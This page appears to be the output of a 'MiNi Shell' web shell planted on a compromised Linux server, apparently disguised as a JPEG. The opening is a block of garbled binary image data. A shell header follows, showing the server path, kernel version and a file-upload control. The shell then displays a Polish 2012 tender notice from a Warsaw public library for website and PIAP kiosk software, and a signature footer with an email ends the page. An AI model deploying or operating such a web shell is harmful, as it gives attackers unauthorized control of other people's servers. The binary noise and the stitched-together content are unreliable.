JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120809/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120809/172909-N-2012.html

<p class="kh_header"><b>Warszawa: usługi informatyczne: tworzenie serwisów informacyjnych bibliotek gminnych, budowa portali bibliotek powiatowych, stworzenie interfejsu PIAP</b><br>
<b>Numer ogłoszenia: 172909 - 2012; data zamieszczenia: 09.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Biblioteka Publiczna m.st. Warszawy - Biblioteka Główna Województwa Mazowieckiego , ul. Koszykowa 26/28, 00-553 Warszawa, woj. mazowieckie, tel. 022 5374143, 5374158, faks 022 5374043.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.biblpubl.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługi informatyczne: tworzenie serwisów informacyjnych bibliotek gminnych, budowa portali bibliotek powiatowych, stworzenie interfejsu PIAP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi informatyczne: tworzenie serwisów informacyjnych bibliotek gminnych, budowa portali bibliotek powiatowych, stworzenie interfejsu PIAP
Przedmiot zamówienia podzielony jest na Zadania, do których można składać oferty częściowe:
Zadanie I: - tworzenie serwisów informacyjnych bibliotek gminnych 
Zadanie II:  budowa portali bibliotek powiatowych 
Zadanie III: stworzenie interfejsu PIAP.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.00.00.00-5, 72.41.30.00-8, 72.30.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZADANIE I
Wykonawca wykaże, że należycie zrealizował w ciągu trzech ostatnich lat przed terminem składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) łącznie  co najmniej:
a)	dwa serwisy internetowe o charakterze informacyjnym o wartości nie mniejszej niż 100 000 zł brutto każdy,
b)	jedną bazę tematyczną w systemie  Share Point o wartości nie mniejszej niż 100 000 zł brutto

Ocena spełniania tego warunku dokonana będzie metodą spełnia/nie spełnia, w oparciu o przedstawione przez Wykonawcę dokumenty i oświadczenia. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek musi spełniać co najmniej jeden Wykonawca lub wszyscy Wykonawcy łącznie.
ZADANIE II
Wykonawca wykaże, że należycie zrealizował w ciągu trzech ostatnich lat przed terminem składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) co najmniej dwa zamówienia polegające na stworzeniu stron internetowych w systemie  Share Point o wartości każdego zamówienia nie mniejszej niż 100 000 zł brutto.   

Ocena spełniania tego warunku dokonana będzie metodą spełnia/nie spełnia, w oparciu o przedstawione przez Wykonawcę dokumenty i oświadczenia. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek musi spełniać co najmniej jeden Wykonawca lub wszyscy Wykonawcy łącznie.

ZADANIE III
Wykonawca wykaże, że należycie zrealizował w ciągu trzech ostatnich lat przed terminem składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) co najmniej jedno zamówienie polegające na stworzeniu aplikacji dla Publicznego Punktu Dostępu do Internetu (PIAP) o wartości zamówienia nie mniejszej niż 80 000 zł brutto.   

Ocena spełniania tego warunku dokonana będzie metodą spełnia/nie spełnia, w oparciu o przedstawione przez Wykonawcę dokumenty i oświadczenia. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek musi spełniać co najmniej jeden Wykonawca lub wszyscy Wykonawcy łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZADANIE I
Wykonawca wykaże, że będzie dysponował:  
a)	zespołem osób, z których:
-minimum 1 osoba posiada co najmniej 2 letnie doświadczenie w wykonywaniu prac związanych z tworzeniem informacyjnych serwisów internetowych
-minimum 1 osoba posiada co najmniej 2 letnie doświadczenie w wykonywaniu prac związanych z opracowaniem baz danych w systemie Share Point 
b)		własnym sprzętem komputerowym i podłączeniem do Internetu

Ocena spełniania tego warunku dokonana będzie metodą spełnia/nie spełnia, w oparciu o przedstawione przez Wykonawcę dokumenty i oświadczenia. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek musi spełniać co najmniej jeden Wykonawca lub wszyscy Wykonawcy łącznie.
ZADANIE II
Wykonawca wykaże, że będzie dysponował:  
a)	minimum 2 osobami, z których każda posiada co najmniej 2 letnie doświadczenie w tworzeniu stron internetowych w systemie  Share Point
b)		własnym sprzętem komputerowym i podłączeniem do Internetu

Ocena spełniania tego warunku dokonana będzie metodą spełnia/nie spełnia, w oparciu o przedstawione przez Wykonawcę dokumenty i oświadczenia. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek musi spełniać co najmniej jeden Wykonawca lub wszyscy Wykonawcy łącznie.
ZADANIE III
Wykonawca wykaże, że będzie dysponował minimum dwiema osobami, z których każda posiada co najmniej 2 letnie doświadczenie w budowie stron internetowych i tworzeniu aplikacji do obsługi infokiosków (urządzeń PIAP)

Ocena spełniania tego warunku dokonana będzie metodą spełnia/nie spełnia, w oparciu o przedstawione przez Wykonawcę dokumenty i oświadczenia. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek musi spełniać co najmniej jeden Wykonawca lub wszyscy Wykonawcy łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do   wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza dokonanie następujących zmian postanowień zawartej umowy :    
1)	zmiany wynagrodzenia o kwotę wynikającą ze zmienionych stawek podatku VAT, obowiązujących w dacie powstania obowiązku podatkowego,
2)	 zmiany osób przeznaczonych do realizacji zamówienia, przy czym osoby zastępujące muszą spełniać wymagania co najmniej na poziomie określonym w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.koszykowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biblioteka Publiczna m. st. Warszawy - Biblioteka Główna Województwa Mazowieckiego, Koszykowa 26/28, wejście C, parter, pok. 5, Dział Gospodarczy, po wcześniejszym, telefonicznym złożeniu zamówienia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2012 godzina 13:30, miejsce: Biblioteka Publiczna m. st. Warszawy - Biblioteka Główna Województwa Mazowieckiego, Koszykowa 26/28, wejście C, parter, pok. 5, Dział Gospodarczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Rozwój społeczeństwa informacyjnego, dzięki rozbudowie Mazowieckiego Systemu Informacji Bibliotecznej (MSIB II) współfinansowany z Europejskiego Funduszu Rozwoju Regionalnego w ramach Priorytetu II Przyspieszenie e-rozwoju Mazowsza Działania 2.1  Przeciwdziałanie wykluczeniu informacyjnemu  Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Tworzenie serwisów informacyjnych bibliotek gminnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stworzenie Informatora lokalnego dla powiatów przystępujących do projektu MSIB.W zakres zamówienia wchodzi  zebranie informacji o podmiotach związanych z życiem społecznym, politycznym, kulturalnym, gospodarczym z terenu 19 powiatów województwa mazowieckiego wg kryteriów dostarczonych przez Zamawiającego i wprowadzenie ich do bazy danych przygotowanej przez Zamawiającego w systemie Share Point.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.30.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa portali bibliotek powiatowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budowa stron internetowych (wizytówek) bibliotek przystępujących do projektu w systemie Share dzięki wykorzystaniu architektury systemu MSIB, winny zostać stworzone systemy informacyjne - indywidualne dla każdej biorącej udział w projekcie biblioteki. Zamówienie obejmuje realizację 142 informacyjnych serwisów gminnych, miejskich i miejsko-gminnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.41.30.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Stworzenie interfejsu PIAP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Napisanie oprogramowania do obsługi bibliotecznych PIAP-ów, składającego się z aplikacji uruchamianej na PIAP-ach, serwera centralnego oraz konsoli zarządzającej administratora..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.30.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com